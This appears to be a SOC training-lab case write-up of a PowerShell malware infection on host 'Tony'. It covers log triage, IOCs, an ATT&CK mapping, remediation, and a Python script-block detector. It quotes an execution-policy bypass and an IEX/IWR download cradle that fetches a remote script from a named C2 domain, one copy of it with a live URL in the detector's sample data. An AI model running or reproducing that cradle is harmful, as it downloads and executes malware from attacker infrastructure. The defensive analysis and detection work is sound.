SOC153 Case Study: Malicious PowerShell Execution Leading to Active Malware Infection
Event ID: 238
Rule Name: SOC153 – Suspicious PowerShell Script Executed
Severity: HIGH
Category: Endpoint Compromise / Malware
Event Time: March 14, 2024 – 05:23 PM
Compromised Host: Tony (172.16.17.206)
Tony at work opened a suspicious file they probably shouldn't have. It was like finding a strange USB drive in the parking lot and plugging it into your computer: you don't know what's on it, but it starts doing things automatically. It ran code that gave access to the malicious actors, who have now taken over the system in this scenario.
Incident Analysis Summary
| Field | Analysis |
|---|---|
| Alert Name | SOC153 - Suspicious PowerShell Script Executed |
| Severity | High (Potential Malware Execution) |
| Event ID | 238 |
| Event Time | Mar 14, 2024, 05:23 PM |
| Compromised Host | Tony (172.16.17.206) |
1. Alert Overview
The alert was triggered due to the execution of a suspicious PowerShell script (payload_1.ps1) on an endpoint. The detection indicated potential malware or unwanted software execution using PowerShell with execution policy bypass techniques.
Initial triage required verification of logs to determine whether the activity represented a false positive or a successful attack.

2. Detection & Verification
Log analysis was conducted in Log Management by searching for the affected host IP:
Client IP: 172.16.17.206
The following log sources were reviewed:
- Firewall logs
- DNS logs
- Proxy logs
- Endpoint / OS logs
PowerShell operational logs confirmed execution of:
payload_1.ps1
- Execution time: 05:23 PM
The script execution was observed under PowerShell Event ID 4104, confirming script block logging. Based on this evidence, the alert was verified as a True Positive.

3. Incident Analysis
Initial Access – Drive-by Compromise
A search for payload_1.ps1 revealed the following download source in proxy logs:
hxxps://files-ld.s3.us-east-2.amazonaws.com/payload_1.ps1

- Proxy action: Allowed
- No associated phishing email found in Email Security logs
Conclusion: Initial access occurred via Drive-by Compromise, where the user downloaded and executed a malicious script from the web rather than through email.
Malware Execution
The malicious PowerShell script was executed from the user's Downloads directory and bypassed execution policy restrictions using the following command:

Set-ExecutionPolicy -Scope Process Bypass
Observed execution command:
powershell.exe -Command IEX(IWR -UseBasicParsing 'hxxps://kionagranada.com/upload/sd2.ps1')
This confirms:
- User execution
- PowerShell abuse
- Execution policy bypass
Command & Control (C2) Activity
Threat intelligence and log analysis identified outbound communication to:

kionagranada[.]com
Resolved IP:
161[.]22[.]46[.]148
- AV/EDR detected the malicious activity
- Malware NOT quarantined/cleaned (active on system)
- Execution observed in process logs
Firewall logs confirmed successful outbound connections, validating active Command & Control communication.
4. Reputation & Threat Intelligence
The SHA-256 hash of payload_1.ps1 was analyzed using VirusTotal:

VirusTotal Findings
- 46 / 71 vendors flagged the file as malicious
- Classified as Trojan / PowerShell Downloader
- Associated with additional payload delivery
- Network indicators linked to known malicious infrastructure
Notable PowerShell Cmdlets Observed
- Invoke-WebRequest (IWR) – Remote payload retrieval
- Invoke-Expression (IEX) – In-memory execution
- New-Object – Object instantiation
- Where-Object – Data filtering
- Write-Output – Script output handling
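Added example (not from the original case write-up): a small Python detector that applies the execution-policy-bypass and IEX/IWR download-cradle patterns from this case to Event ID 4104 script block text. The sample events, rule names and severity logic are assumptions for illustration; the first two entries mirror the commands observed above, the third is benign.

```python
import re
from dataclasses import dataclass

# Constructed sample of Microsoft-Windows-PowerShell/Operational Event ID 4104
# ScriptBlockText entries (not real log exports). Real logs carry the live
# https:// URL, so the URL here is not defanged.
SAMPLE_4104 = [
    {"host": "Tony", "event_id": 4104,
     "script": "Set-ExecutionPolicy -Scope Process Bypass"},
    {"host": "Tony", "event_id": 4104,
     "script": "IEX(IWR -UseBasicParsing 'https://kionagranada.com/upload/sd2.ps1')"},
    {"host": "Tony", "event_id": 4104,
     "script": "Get-ChildItem C:\\Users\\Tony\\Downloads | Where-Object Length -gt 1MB"},
]

# Each rule: (name, ATT&CK ID from the mapping in this write-up, regex).
# Short aliases are included because the observed command used IEX and IWR.
RULES = [
    ("execution_policy_bypass", "T1562",
     re.compile(r"Set-ExecutionPolicy\b.*\bBypass\b|-(?:ExecutionPolicy|ep)\s+Bypass", re.I)),
    ("download_cradle", "T1105",
     re.compile(r"\b(?:Invoke-Expression|IEX)\b.*\b(?:Invoke-WebRequest|IWR|DownloadString)\b", re.I)),
    ("remote_script_url", "T1071.001",
     re.compile(r"https?://[^\s'\"]+\.ps1\b", re.I)),
]

@dataclass
class Finding:
    host: str
    rule: str
    technique: str
    script: str

def scan_script_blocks(events):
    """Return one Finding per (4104 event, matching rule); other event IDs are skipped."""
    findings = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        for name, technique, rx in RULES:
            if rx.search(ev["script"]):
                findings.append(Finding(ev["host"], name, technique, ev["script"]))
    return findings

def classify_host(events):
    """Assumed triage logic: bypass AND cradle on one host is 'high', any single hit 'medium'."""
    hits = {f.rule for f in scan_script_blocks(events)}
    if {"execution_policy_bypass", "download_cradle"} <= hits:
        return "high"
    return "medium" if hits else "none"
```

The benign Get-ChildItem entry shows that Where-Object alone, which the write-up lists among the observed cmdlets, does not trigger a finding; only the bypass-plus-cradle combination escalates the host.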

5. Indicators of Compromise (IOCs)
| Category | Value |
|---|---|
| File Name | payload_1.ps1 |
| SHA-256 | db8be06ba6d2d3595dd0c86654a48cfc4c0c5408fdd3f4e1eaf342ac7a2479d0 |
| C2 Domain | kionagranada.com |
| C2 IPs | 161[.]22.46.148, 91[.]236.116.163 |
| Malicious URLs | hxxps://kionagranada.com/upload/sd2.ps1 |
| Host IP | 172[.]16.17.206 |

6. MITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Drive-by Compromise | T1189 |
| Execution | PowerShell | T1059.001 |
| Execution | User Execution | T1204 |
| Defense Evasion | Execution Policy Bypass | T1562 |
| Command & Control | Web Protocols | T1071.001 |
| Command & Control | Ingress Tool Transfer | T1105 |
7. Sigma Rule and Yara Rule
Immediate Actions Taken
- Containment: Endpoint containment initiated via EDR
- C2 Confirmation: Verified C2 communication occurred
- Threat Indicator: Marked as malicious infrastructure
Recommended Next Steps
Short-term (Remediation):
- Isolate host “Tony” from network
- Perform full malware scan/removal
- Reset credentials for affected user account
- Block C2 domains at firewall/proxy level
Medium-term (Prevention):
- Implement PowerShell logging (Module/Transcript)
- Restrict PowerShell execution policies
- Enhance endpoint detection rules for IEX/IWR patterns
- User awareness training on suspicious downloads
Long-term (Hardening):
- Application whitelisting for PowerShell
- Implement AMSI (Anti-Malware Scan Interface)
- Regular security baseline reviews
Final Assessment
True Positive - Active Malware Infection
The incident represents a successful malware execution with confirmed C2 communication. The attacker achieved initial access through user execution of a malicious PowerShell script, bypassed security controls, and established remote command capabilities.
Risk Level: CRITICAL
- Data exfiltration possible
- Lateral movement potential
- Persistence mechanisms likely installed
Lessons Learned
- User awareness training is critical to prevent execution of unknown scripts
- PowerShell execution policies alone are insufficient
- Script block logging (Event ID 4104) is essential for detection
- Web-based payload delivery must be monitored and restricted
- EDR solutions must actively block, not just alert